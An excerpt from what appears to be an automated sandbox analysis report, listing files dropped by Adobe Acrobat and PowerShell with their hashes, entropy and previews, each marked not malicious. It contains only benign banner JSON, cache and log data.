                                                                                        C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Banner

                                                                                        Download File
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):289
                                                                                        Entropy (8bit):5.271560889804696
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:YEQXJ2HX46+nZiQ0YIoAvJf8dPeUkwRe9:YvXKX4/ccGU8Ukee9
                                                                                        MD5:91D20AFB796A9834A2C3D1978E72D982
                                                                                        SHA1:AB75870A0F59E9B6409476B308360E173888B02D
                                                                                        SHA-256:5CD6B2357F9E090B59BB4C98ECED7186B724D7A7B1E0BFF0578085D5E4DA2317
                                                                                        SHA-512:AF8D7D94F666D15708C09682D33CBDD188DA6015595321FADDA8A40788F2AE2AC1A337B15B8B1BFF817EA1274CAD9D9FB0789631AC2C43EDCBD27199549275BE
                                                                                        Malicious:false
                                                                                        Preview:{"analyticsData":{"responseGUID":"f0441a81-060b-4f05-ac10-cb14b80ea542","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1734785715359,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                        C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Retention

                                                                                        Download File
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):292
                                                                                        Entropy (8bit):5.27508692337727
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:YEQXJ2HX46+nZiQ0YIoAvJfQ1rPeUkwRe9:YvXKX4/ccGY16Ukee9
                                                                                        MD5:9E85DBBCE63B9A8AFFCAD5F3F89AAF40
                                                                                        SHA1:6B01747A375BF0288A5D6BB4B12FC5D6941792D4
                                                                                        SHA-256:CA737675C1F328E35EB467180667F940C76F272B6013719D6F8F2AD4E4FEBAE3
                                                                                        SHA-512:C715964D99194199749DA8A1AABF356902F2D0F933505594C44B95B15E886469393AD2EB3B7F9A40E53BE7021C3B705BE701867149A5E3A82E1F98355F651D0D
                                                                                        Malicious:false
                                                                                        Preview:{"analyticsData":{"responseGUID":"f0441a81-060b-4f05-ac10-cb14b80ea542","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1734785715359,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                        C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Edit_LHP_Banner

                                                                                        Download File
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):289
                                                                                        Entropy (8bit):5.284311940721448
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:YEQXJ2HX46+nZiQ0YIoAvJfFldPeUkwRe9:YvXKX4/ccGz8Ukee9
                                                                                        MD5:94EB358628B4B2FE01AC347DB28D0DD9
                                                                                        SHA1:7587D1CD160A02BE76E60CFA4AFAA9ACFC7D3ED3
                                                                                        SHA-256:2A546242DCCF93176D65C5C30C328D92128EFE28A88710A2700F532090814722
                                                                                        SHA-512:9B6643A2B762CBC8282581748B51E3656D944CD2111D70C3F287773813CD837887A2D8BD522A7227F1788CAB16C4140A4F92D0890C2F54B419AA9393EB8DE7B7
                                                                                        Malicious:false
                                                                                        Preview:{"analyticsData":{"responseGUID":"f0441a81-060b-4f05-ac10-cb14b80ea542","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1734785715359,"statusCode":200,"surfaceID":"DC_Reader_Edit_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                        C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Home_LHP_Trial_Banner

                                                                                        Download File
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):295
                                                                                        Entropy (8bit):5.298831887454261
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:YEQXJ2HX46+nZiQ0YIoAvJfzdPeUkwRe9:YvXKX4/ccGb8Ukee9
                                                                                        MD5:886AE199AD8A375E50532A41B434DF78
                                                                                        SHA1:03A43CE70597F8A59FB24878DAB3CD94E23C1CD8
                                                                                        SHA-256:AE2948F36854F4CA8AADE3FAC318A8198226D1BCC5CBF076DB731B1B2571FA50
                                                                                        SHA-512:5EEFFB18A4D570A8328F19A6AEE0FB2C647CE5528E525BF8AF32AC2AE67C3FE117C3A58EEFC309F4A0FC2F2DBDE7ECE27412C55DCF5F0EF12D7411B2A1E409D6
                                                                                        Malicious:false
                                                                                        Preview:{"analyticsData":{"responseGUID":"f0441a81-060b-4f05-ac10-cb14b80ea542","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1734785715359,"statusCode":200,"surfaceID":"DC_Reader_Home_LHP_Trial_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                        C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_More_LHP_Banner

                                                                                        Download File
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):289
                                                                                        Entropy (8bit):5.27932684339049
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:YEQXJ2HX46+nZiQ0YIoAvJfYdPeUkwRe9:YvXKX4/ccGg8Ukee9
                                                                                        MD5:AEB30E5581DE750A4BF616403C85175F
                                                                                        SHA1:FF6A190856930CBE591D785AE0B595D4B4B6212A
                                                                                        SHA-256:0FCC6665E128F5813920A81D64D90ACA0CF522962B84A216CC78DADD1595C570
                                                                                        SHA-512:A1773BBA334601BDEB5C60FB977F884625B1531B556B4C468CD4162A8B5C2F28F745FF82734BF72680DB7498CBB5CB7385F6CA22383FCBD2E8165AFB11406EB4
                                                                                        Malicious:false
                                                                                        Preview:{"analyticsData":{"responseGUID":"f0441a81-060b-4f05-ac10-cb14b80ea542","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1734785715359,"statusCode":200,"surfaceID":"DC_Reader_More_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                        C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Banner

                                                                                        Download File
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):284
                                                                                        Entropy (8bit):5.265013252188548
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:YEQXJ2HX46+nZiQ0YIoAvJf+dPeUkwRe9:YvXKX4/ccG28Ukee9
                                                                                        MD5:9B0C6280C83A0D835F6D8B604187AE80
                                                                                        SHA1:EE46D8977BE176C0A0502112420DF0A67F0668A3
                                                                                        SHA-256:47776891D93DE697D7CFBA25A7BDAE697DD28421C9E5767E86029732D6A1C040
                                                                                        SHA-512:9F380E22C0234797BC6367DC66F4957500528A3F4CDDA5C9997F3B732CF5C5040ECA78B4EA32B5EF904EFC1D4C243F2FA624C2875E8BC803E8974FE55F613BEB
                                                                                        Malicious:false
                                                                                        Preview:{"analyticsData":{"responseGUID":"f0441a81-060b-4f05-ac10-cb14b80ea542","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1734785715359,"statusCode":200,"surfaceID":"DC_Reader_RHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                        C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Intent_Banner

                                                                                        Download File
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):291
                                                                                        Entropy (8bit):5.2630160246149345
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:YEQXJ2HX46+nZiQ0YIoAvJfbPtdPeUkwRe9:YvXKX4/ccGDV8Ukee9
                                                                                        MD5:9F9A8CB9E2B57FB34F0AA4C9F1497C0A
                                                                                        SHA1:B8D6114312EAA2DCC24E4D087A457BC213A67B42
                                                                                        SHA-256:5843814DA9216BC62DAD7B12552428E613C0B0A2A495EAF4276DC03BCB70B5D3
                                                                                        SHA-512:E8F328A0D7CE4A9BD4F43E0433C97AD0D56E4A74A03C532A73C689C79FA66E6B0A80CD6A043627C6CC8E0307ABF3291E9E0542659F047D9D841B3A6791545CBB
                                                                                        Malicious:false
                                                                                        Preview:{"analyticsData":{"responseGUID":"f0441a81-060b-4f05-ac10-cb14b80ea542","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1734785715359,"statusCode":200,"surfaceID":"DC_Reader_RHP_Intent_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                        C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Retention

                                                                                        Download File
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):287
                                                                                        Entropy (8bit):5.266407063155739
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:YEQXJ2HX46+nZiQ0YIoAvJf21rPeUkwRe9:YvXKX4/ccG+16Ukee9
                                                                                        MD5:D8D9AB89FA90FC5F524066D179DC4AFC
                                                                                        SHA1:0D7DC9092749E7033D9794F3D28A6A0C464613E8
                                                                                        SHA-256:75C1D37AD779445F0E39844CEAF52ADF78DF123181E81B4FE1FEAA2217CB0273
                                                                                        SHA-512:0797ECF4E2E02B10B2707B79F229814D2F69C46770AD83DAEAA2A510B54FBDEB4B11394D6F891A622D8ADD7ABD140F2335BB4D1ABDFBB58D1EC646D5B3F17FFF
                                                                                        Malicious:false
                                                                                        Preview:{"analyticsData":{"responseGUID":"f0441a81-060b-4f05-ac10-cb14b80ea542","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1734785715359,"statusCode":200,"surfaceID":"DC_Reader_RHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                        C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Sign_LHP_Banner

                                                                                        Download File
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):1090
                                                                                        Entropy (8bit):5.667248036438856
                                                                                        Encrypted:false
                                                                                        SSDEEP:24:Yv6X4kpamXayLgE+cNDxeNaqnAvz7xHn0RCmK8czOC/BSf:Yv9KBgkDMUJUAh8cvMf
                                                                                        MD5:7C8F3B4FA07E4296099225B329E4C55A
                                                                                        SHA1:F00A397699F5D380E5CBCEFB709A689DFD253A4B
                                                                                        SHA-256:7C7215039EB0FCE3A60EADB3150E7256507D4722B3048E24F84B1F7AFB5848A7
                                                                                        SHA-512:197F48A39C7A6F8DD3BACFFAAC817AA425402CEE93BBA26728248AA401DDD716E0B9FC84CCEFC645F53470F82681DDAD5D51BBF2141A49BCA3DE9C7FDF2F49AE
                                                                                        Malicious:false
                                                                                        Preview:{"analyticsData":{"responseGUID":"f0441a81-060b-4f05-ac10-cb14b80ea542","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1734785715359,"statusCode":200,"surfaceID":"DC_Reader_Sign_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Sign_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_0","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"266234d2-130d-426e-8466-c7a061db101f","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Sign_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IlVwZ3JhZGVSSFBSZHJBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkVhc2lseSBmaWxsIGFuZCBzaWduIFBERnMuIn0sInRjYXRJZCI6bnVsbH0=","dataType":"app

                                                                                        C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Upsell_Cards

                                                                                        Download File
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):286
                                                                                        Entropy (8bit):5.244943275131366
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:YEQXJ2HX46+nZiQ0YIoAvJfshHHrPeUkwRe9:YvXKX4/ccGUUUkee9
                                                                                        MD5:56F2FD2108B2A95FD69A2D9DC5AB1EF2
                                                                                        SHA1:A5D214A6F9AFEAC153336D30971077F08A26B036
                                                                                        SHA-256:88F8BF8ACA52D78279EE2230C0F1327E7180BFEF358565A378F6C987F52836CE
                                                                                        SHA-512:2519B201C8B337A12E9688E9561C6AA47BF56CFAE145990AB3851045743119FA2E95666E5D8500AC24DABAAA601BDAF78C5DB8A860800340E6C15976508CFEFE
                                                                                        Malicious:false
                                                                                        Preview:{"analyticsData":{"responseGUID":"f0441a81-060b-4f05-ac10-cb14b80ea542","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1734785715359,"statusCode":200,"surfaceID":"DC_Reader_Upsell_Cards","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                        C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\Edit_InApp_Aug2020

                                                                                        Download File
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):282
                                                                                        Entropy (8bit):5.249277346104674
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:YEQXJ2HX46+nZiQ0YIoAvJTqgFCrPeUkwRe9:YvXKX4/ccGTq16Ukee9
                                                                                        MD5:A1CE70EB716AD46D4C95C13CBDB6C8C5
                                                                                        SHA1:3325E174EBA2CC96BEAD29821DA332666C80246C
                                                                                        SHA-256:82C1289B533FC8FCDBB92F7C618D4F6DBEAC22C45EBC1EB6DE02547D8F3B75D9
                                                                                        SHA-512:417B1B97011D11A6DD838EF9B89C8FB04C810624195DE5EB2195FCB509F17BA68648B85E7DBB94468D4344C9FEDD7662780EAAAAB0D326147A62133BDC8426CF
                                                                                        Malicious:false
                                                                                        Preview:{"analyticsData":{"responseGUID":"f0441a81-060b-4f05-ac10-cb14b80ea542","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1734785715359,"statusCode":200,"surfaceID":"Edit_InApp_Aug2020","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                        C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\TESTING

                                                                                        Download File
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):4
                                                                                        Entropy (8bit):0.8112781244591328
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:e:e
                                                                                        MD5:DC84B0D741E5BEAE8070013ADDCC8C28
                                                                                        SHA1:802F4A6A20CBF157AAF6C4E07E4301578D5936A2
                                                                                        SHA-256:81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06
                                                                                        SHA-512:65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71
                                                                                        Malicious:false
                                                                                        Preview:....

                                                                                        C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\SOPHIA.json

                                                                                        Download File
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):2814
                                                                                        Entropy (8bit):5.131970944373652
                                                                                        Encrypted:false
                                                                                        SSDEEP:48:YKmnSe87AaDpWoDhpYWbtuoxsXPHvUSqrOuFR96Tt/:+TJWRYjU5BAF
                                                                                        MD5:3421810C9454BC41801224D3B57886B8
                                                                                        SHA1:A9D4043ED997D028CD6E8249BB8795BF1FBE0722
                                                                                        SHA-256:EE773F1F439A84B9A6E94F039429570B6371A86C0F4A86D77317B3D8C598FF73
                                                                                        SHA-512:8FFB07245DF54C32BB237B1A305A07A8775519F99684E3302BE62692E9CEDB705F0D354F79ACF04CB4915C6136BCAD55B8C53FD65AF1C224DF308CD8669EF28F
                                                                                        Malicious:false
                                                                                        Preview:{"all":[{"id":"DC_Reader_Disc_LHP_Banner","info":{"dg":"f354126d2e4b0e054a1544bb4503ce2c","sid":"DC_Reader_Disc_LHP_Banner"},"mimeType":"file","size":289,"ts":1734609180000},{"id":"DC_Reader_Sign_LHP_Banner","info":{"dg":"e5ae5f6949a7fc279f8683b7f5dc640f","sid":"DC_Reader_Sign_LHP_Banner"},"mimeType":"file","size":1090,"ts":1734609180000},{"id":"DC_Reader_Convert_LHP_Banner","info":{"dg":"c408e3f0da110093826bd1f13c35fabe","sid":"DC_Reader_Convert_LHP_Banner"},"mimeType":"file","size":1123,"ts":1734609180000},{"id":"DC_Reader_Home_LHP_Trial_Banner","info":{"dg":"ce03670f686227699ce78159c12654e4","sid":"DC_Reader_Home_LHP_Trial_Banner"},"mimeType":"file","size":295,"ts":1734609180000},{"id":"DC_Reader_Disc_LHP_Retention","info":{"dg":"e902b553eba06411d2f61a4ebfaa4cd7","sid":"DC_Reader_Disc_LHP_Retention"},"mimeType":"file","size":292,"ts":1734609180000},{"id":"DC_Reader_More_LHP_Banner","info":{"dg":"5bed2eba57e99855ea25a5e4fa95061c","sid":"DC_Reader_More_LHP_Banner"},"mimeType":"file","

                                                                                        C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents

                                                                                        Download File
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 24, database pages 3, cookie 0x2, schema 4, UTF-8, version-valid-for 24
                                                                                        Category:dropped
                                                                                        Size (bytes):12288
                                                                                        Entropy (8bit):1.1445895242415662
                                                                                        Encrypted:false
                                                                                        SSDEEP:24:TLhx/XYKQvGJF7urslLRZXcMRZXcMZgux3Fmu3n9u1oGuDyIX4uDyvuOudIUudcY:TFl2GL7mslPXc+XcGNFlRYIX2v3kch
                                                                                        MD5:4F44F863B311154860248883E1174931
                                                                                        SHA1:639BA08957B50F8A19BC8AC0512A7335E56FCADC
                                                                                        SHA-256:CB7254FC6C4D7D447E81DA601689C2D1E4170AE49BFF62ABF8FDE607075EB87F
                                                                                        SHA-512:4DB77E24F9AE03E8FE90E806D818F2EDBCCED03D20954376400A77A552CDCB81CA6CB03966EA783AAA3A42A14BC96BF29D6D43C1125F0E1C89E6CD32DDED37CD
                                                                                        Malicious:false
                                                                                        Preview:SQLite format 3......@ ..........................................................................c.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                        C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents-journal

                                                                                        Download File
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                        File Type:SQLite Rollback Journal
                                                                                        Category:dropped
                                                                                        Size (bytes):8720
                                                                                        Entropy (8bit):1.5502951543441779
                                                                                        Encrypted:false
                                                                                        SSDEEP:24:7+tzLUXcMRZXcMZgux3Fmu3n9u1oGuDyIX4uDyvuOudIUudcHRuLuxjBqLxx/XY3:7Mz4Xc+XcGNFlRYIX2vsqVl2GL7ms+
                                                                                        MD5:84301EEB9833E3BC521D8058C83427CF
                                                                                        SHA1:8A8F2E09D2C2FDC4303591749E843B4A389B28E4
                                                                                        SHA-256:7B743CA68D26B0956688BF7DA2670B0D136E12C3901093B550D0780FC85909BF
                                                                                        SHA-512:22ECB03283D4284F142D96DC03543678B0509E9436422778031FD7575D9FF55CF19E72BB0430FB9B044D793AAA230A800135F3411513D581EAB3FC616634127E
                                                                                        Malicious:false
                                                                                        Preview:.... .c......4.B..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................b..b.b.b.b.b.b.b.b.b.b.b.b.b..................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                        C:\Users\user\AppData\Local\Adobe\Acrobat\DC\UserCache64.bin

                                                                                        Download File
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):66726
                                                                                        Entropy (8bit):5.392739213842091
                                                                                        Encrypted:false
                                                                                        SSDEEP:768:RNOpblrU6TBH44ADKZEgnT0OPUZxkr9Ls+NCUas+WPYyu:6a6TZ44ADET0OPqxkZL53K
                                                                                        MD5:EB2587C338191892A334C4FA260F23BD
                                                                                        SHA1:0E379A6DE7EA6424008A5AEDB6124E9F22FFA51C
                                                                                        SHA-256:7BC5430E20C2B3788F8038CAA1327507A97AF5606399754B2572E6ABC2989674
                                                                                        SHA-512:2B7CB2D188879FD817214742987F491C0FDD06E8C22DB655BD46DB5B61E5FB075315979C224DE005B62623A5CE06356C41EA8F860E64CA6A19AF7E179397A5D1
                                                                                        Malicious:false
                                                                                        Preview:4.397.90.FID.2:o:..........:F:AgencyFB-Reg.P:Agency FB.L:$.........................."F:Agency FB.#.96.FID.2:o:..........:F:AgencyFB-Bold.P:Agency FB Bold.L:%.........................."F:Agency FB.#.84.FID.2:o:..........:F:Algerian.P:Algerian.L:$..........................RF:Algerian.#.95.FID.2:o:..........:F:ArialNarrow.P:Arial Narrow.L:$.........................."F:Arial Narrow.#.109.FID.2:o:..........:F:ArialNarrow-Italic.P:Arial Narrow Italic.L:$.........................."F:Arial Narrow.#.105.FID.2:o:..........:F:ArialNarrow-Bold.P:Arial Narrow Bold.L:%.........................."F:Arial Narrow.#.118.FID.2:o:..........:F:ArialNarrow-BoldItalic.P:Arial Narrow Bold Italic.L:%.........................."F:Arial Narrow.#.77.FID.2:o:..........:F:ArialMT.P:Arial.L:$.........................."F:Arial.#.91.FID.2:o:..........:F:Arial-ItalicMT.P:Arial Italic.L:$.........................."F:Arial.#.87.FID.2:o:..........:F:Arial-BoldMT.P:Arial Bold.L:$.........................."F:Arial.#.100.FID.2

                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):64
                                                                                        Entropy (8bit):1.1940658735648508
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Nlllul5zR/lL:NllU
                                                                                        MD5:A5504FD0F9BD6D8A85D83E1D0C86FBD1
                                                                                        SHA1:BE7D4EF288DE5F0C413C403ED471E51B574F4081
                                                                                        SHA-256:164D3BF457FA5CF68FE086795A945A8C54AA972FD8B8FA3C2A22EB5B741C1EB7
                                                                                        SHA-512:2D091AA5F1249D860C8FF969FFE7EEE8865C53A3B791E07BBD1E3CEA72355A3502D9E86A7F5055F21149A2ED01C6E77000B541D5432D10AC5F76BB2C017F4550
                                                                                        Malicious:false
                                                                                        Preview:@...e...................................t............@..........

                                                                                        C:\Users\user\AppData\Local\Temp\MSI3a69c.LOG

                                                                                        Download File
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):246
                                                                                        Entropy (8bit):3.5274671434738973
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:Qgl946caEbiQLxuZUQu+lEbYnuoblv2K8mUlAF6e:Qw946cPbiOxDlbYnuRKdr
                                                                                        MD5:1583056785E8DA995E472B649F44BA24
                                                                                        SHA1:61AE14B4FB43CF03C09C49F6AA6110497381DAA3
                                                                                        SHA-256:77960133D1701D300B98EB1BECE650B7AD88A8B97747FF848E41F8BD6269F863
                                                                                        SHA-512:47B4D57594613DCD66A5C0C1E9FE8440940446836FE9BEFF36CF77D11B640F0F16ECB6A5D27DBDE089A30CFA83A91B09D679BC1F4E017F395C4AC9A01C5F2DF7
                                                                                        Malicious:false
                                                                                        Preview:..E.r.r.o.r. .2.7.1.1...T.h.e. .s.p.e.c.i.f.i.e.d. .F.e.a.t.u.r.e. .n.a.m.e. .(.'.A.R.M.'.). .n.o.t. .f.o.u.n.d. .i.n. .F.e.a.t.u.r.e. .t.a.b.l.e.......=.=.=. .L.o.g.g.i.n.g. .s.t.o.p.p.e.d.:. .1.9./.1.2./.2.0.2.4. . .0.6.:.5.2.:.5.6. .=.=.=.....

                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4jxyesqh.rpv.ps1

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5tqwlirn.ki0.ps1

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cxmsavww.zav.psm1

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ugz5zb0w.2qg.psm1

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
